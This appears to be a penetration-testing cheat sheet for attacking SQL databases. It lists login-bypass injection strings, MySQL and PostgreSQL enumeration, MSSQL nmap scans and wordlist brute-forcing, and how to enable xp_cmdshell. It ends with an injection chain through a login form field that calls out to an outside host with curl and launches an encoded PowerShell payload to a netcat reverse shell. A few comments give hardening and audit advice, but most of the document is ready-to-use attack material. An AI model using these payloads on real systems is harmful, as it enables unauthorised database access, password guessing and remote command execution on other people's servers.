SQL
Login Bypasses
' OR 1=1' --
' or 1=1 --
' OR '' = '
admin' -- //
admin' or '
MySQL
PostgreSQL
MSSQL
Enumerate
' OR 1=1' --
' or 1=1 --
' OR '' = '
admin' -- //
admin' or '
# MySQL service control on the host itself; systemctl needs root/sudo.
systemctl status mysql
systemctl restart mysql
# Interactive client login; -p prompts for the password instead of taking it on
# the command line, so it does not end up in shell history or the process list.
mysql -u nurhodelta -p
-- Lists only the databases this account holds privileges on; a least-privilege
-- application account should expose very little here.
SHOW DATABASES;
USE employee_akpoly;
-- Whole-table read; wholesale SELECT * on HR tables is what DB audit logging
-- (general log / audit plugin) should surface for an application account.
SELECT * FROM tblemployee;
SELECT * FROM tblleave;
# Nmap scan
nmap -T4 -sV -p 5432,5433
# Connect
psql -h IP -U user -d database
nmap -n -v -sV -Pn -p 1433 -script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password 10.10.194.142
# Brute force
nmap -n -sV -Pn -p 1433 -script ms-sql-brute -script-args userdb=users_ldap.txt,passdb=/usr/share/wordlists/rockyou.txt 10.10.194.142
# Impacket
impacket-mssqlclient Administrator:<PASSWORD>@<TARGET_IP> -windows-auth
-- sp_configure requires the ALTER SETTINGS server permission (held implicitly by
-- sysadmin/serveradmin), so a login that can run this sequence is already highly
-- privileged. Hardening: keep xp_cmdshell disabled and run the SQL Server service
-- under a low-privilege account; detection: audit sp_configure/RECONFIGURE changes
-- and xp_cmdshell executions via SQL Server Audit or Extended Events.
EXECUTE sp_configure 'show advanced options', 1;
-- RECONFIGURE applies the pending configuration value.
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
-- The OS command runs as the SQL Server service account (or the configured
-- xp_cmdshell proxy account for non-sysadmin callers).
EXECUTE xp_cmdshell 'whoami';
# Identify sleep 10sec
';waitfor delay '0:0:10'--
# Enable xp_cmdshell
UsernameTextBox=admin';EXEC sp_configure 'show advanced options', 1--+
UsernameTextBox=admin';RECONFIGURE--+
UsernameTextBox=admin';EXEC sp_configure 'xp_cmdshell', 1--+
UsernameTextBox=admin';RECONFIGURE--+
# Verify
python -m http.server 80
UsernameTextBox=admin';EXEC xp_cmdshell 'curl http://192.168.45.227'--+&...
# RCE
rlwrap nc -lvnp 4444
UsernameTextBox=admin';EXEC xp_cmdshell 'powershell -e B64PAYLOAD=='&PasswordTextBox=...